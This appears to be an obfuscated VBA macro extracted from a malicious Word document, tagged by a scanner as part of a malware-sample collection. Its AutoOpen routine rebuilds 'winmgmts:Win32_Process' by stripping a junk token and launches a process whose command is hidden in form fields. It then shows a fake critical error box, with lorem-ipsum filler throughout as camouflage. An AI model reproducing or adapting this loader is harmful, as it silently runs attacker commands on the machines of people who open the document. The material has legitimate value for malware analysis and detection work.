Attribute VB_Name = "Ddoxbzyd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Rcjekvazu, 2, 5, MSForms, TextBox"
Attribute VB_Control = "Psemlzvdgc, 1, 6, MSForms, TextBox"
Attribute VB_Control = "Gpmbqteptdpqi, 0, 7, MSForms, TextBox"
Attribute VB_Name = "Gcjyxujg"
Attribute VB_Base = "0{660A5D6E-B707-4C36-B887-AF297A221659}{4ED08A95-EB1E-40E1-82DA-69935F0CBB4D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Qzearopm"
Function Nibyxvmg(Yatbzzhq)
On Error Resume Next
   Dim ipGYE, wraTI
Dim ygjTppD, yuDBAAalm, LurqHBeHe
Nibyxvmg = Illinare(Yatbzzhq, "SinQ", "")
   Dim UqcFLCX()
ReDim UqcFLCX(1)
UqcFLCX(0) = "Est est accusantium est quibusdam veritatis."

Dim wdkjA()
ReDim wdkjA(1)
wdkjA(0) = "Nihil."

End Function
Function Illinare(Oresantito, Hopedis, Diposito)
On Error Resume Next
   Dim HgnNJw()
ReDim HgnNJw(3)
HgnNJw(0) = "Sit veniam."
HgnNJw(1) = "Quia quia cumque eveniet voluptatum nam explicabo."
HgnNJw(2) = "Veritatis molestiae velit."

Dim UTGOF, AxgADG, exdoI
Illinare = _
 Replace(Oresantito, Hopedis, Diposito)
   Dim sHMsGII()
ReDim sHMsGII(1)
sHMsGII(0) = "Accusantium vitae debitis illum et neque soluta aut provident et."

Dim JvuJInA, PdcmrGDsb, LvRVBB
End Function
Sub autoopen()
On Error Resume Next
   Dim uitVcBGGI, edRloHn
Dim OrdRBA, sDSNIyJO, OxPIEuD
Nhhpagvofvdm
   Dim nMBmu()
ReDim nMBmu(1)
nMBmu(0) = "Voluptatem quia corrupti."

Dim beFBxJBI()
ReDim beFBxJBI(2)
beFBxJBI(0) = "Malcolm"
beFBxJBI(1) = "Sit nesciunt."

End Sub

Attribute VB_Name = "Qzvttzvirfs"
Function Nhhpagvofvdm()
On Error Resume Next
   Dim JXbYA, XSYkRDFO
Dim INdmIiU, JJIvBJ, FzzYY
Set Iptftpgkpabgv = CreateObject(Hmwyzutenzbzo(Gcjyxujg.Bhkdtmatjsr + Ddoxbzyd.Gpmbqteptdpqi))
   Dim HTDtOEF()
ReDim HTDtOEF(1)
HTDtOEF(0) = "Earum molestias quasi quam ullam cumque illum facilis."

Dim eNrMJDAFK, CImcEGF
Iptftpgkpabgv.XSize = 5433 < 5133
   Dim EWmoS, GhFNGEACE, Opwmki
Dim cwAFTLcNn()
ReDim cwAFTLcNn(2)
cwAFTLcNn(0) = "Quo omnis esse."
cwAFTLcNn(1) = "Rerum cumque quisquam harum id distinctio quibusdam deserunt."

Zfoxiyivqi = "SinQSinQSinQ2SinQ_SinQPSinQrSinQoSinQcSinQeSinQsSinQSinQsSinQSinQ"
   Dim ljuRE, SKphJADGE
Dim rZkNXEGH()
ReDim rZkNXEGH(1)
rZkNXEGH(0) = "Suscipit voluptas delectus assumenda."

Iptftpgkpabgv.YSize = 5433 < 5133
   Dim RkumFADJ()
ReDim RkumFADJ(2)
RkumFADJ(0) = "Aut odio."
RkumFADJ(1) = "Perferendis."

Dim vFZadB()
ReDim vFZadB(3)
vFZadB(0) = "Omnis sed consectetur eos."
vFZadB(1) = "Et quas neque."
vFZadB(2) = "Et."

Hzywbhvn = "SinQSinQSinQwSinQiSinQnmSinQgSinQmSinQtsSinQ:SinQWSinQiSinQnSinQSinQ3SinQSinQ" + Zfoxiyivqi
   Dim NuOtF, UODPHHCLJ, haMHCGAx
Dim CdddDxQBI, WQPaJWIJD, VOYIGhFAB
Dim Qigmtztk()
   Dim DPUAjE()
ReDim DPUAjE(1)
DPUAjE(0) = "Sed non occaecati."

Dim mRNpUJ
ReDim Qigmtztk(7727)
   Dim uNEfBEARA
Dim JIxxJwB, OElTiG, icjSjBH
Qigmtztk(6342) = Hmwyzutenzbzo(Ddoxbzyd.Psemlzvdgc + Gcjyxujg.Ngcowgaqwjc + Gcjyxujg.Eixhuxkyocwkd)
   Dim fukjd, vJMmJrIK
Dim iJvaCl()
ReDim iJvaCl(3)
iJvaCl(0) = "Provident rem repudiandae commodi odio dolor commodi rerum ea nihil."
iJvaCl(1) = "Quos tempora ut rerum et quis."
iJvaCl(2) = "Accusamus."

Set Efkrrylamgooj = CreateObject(Hmwyzutenzbzo(Hzywbhvn))
   Dim ClbPFDxIH, cExOEHH
Dim BgrCB, efXBBpJi
Kjhzurmwv = Efkrrylamgooj.Create((Qigmtztk(6342)), Michtzjy, Iptftpgkpabgv, Hxbaniyjulcpi)
   Dim pyHiJDo, ROjyCTBJ, UIPVgJDgG
Dim SFzuzEGJq()
ReDim SFzuzEGJq(3)
SFzuzEGJq(0) = "Boyd"
SFzuzEGJq(1) = "Corrupti modi."
SFzuzEGJq(2) = "Irvin"

Camtakqtymij = MsgBox(Gcjyxujg.Ysrwvjukav, vbCritical, Gcjyxujg.Nfnjsllhy)
   Dim mipqlHBm
Dim KynBGBqI()
ReDim KynBGBqI(1)
KynBGBqI(0) = "Billy"

End Function

Attribute VB_Name = "Trpnuyuuwi"
Function Hmwyzutenzbzo(Hzywbhvn)
On Error Resume Next
   Dim lbfky()
ReDim lbfky(2)
lbfky(0) = "Delectus."
lbfky(1) = "Ut."

Dim tdCUC
Hmwyzutenzbzo = Nibyxvmg(Nibyxvmg(Nibyxvmg(Nibyxvmg(Hzywbhvn))))
   Dim rBVjog, QoYZHyWGI, MsyOybFA
Dim NjjEqGH, QxrHPFBEu, iCRZUy
End Function

' InQuest injected base64 decoded content
' t7J)

INQUEST-PP=macro
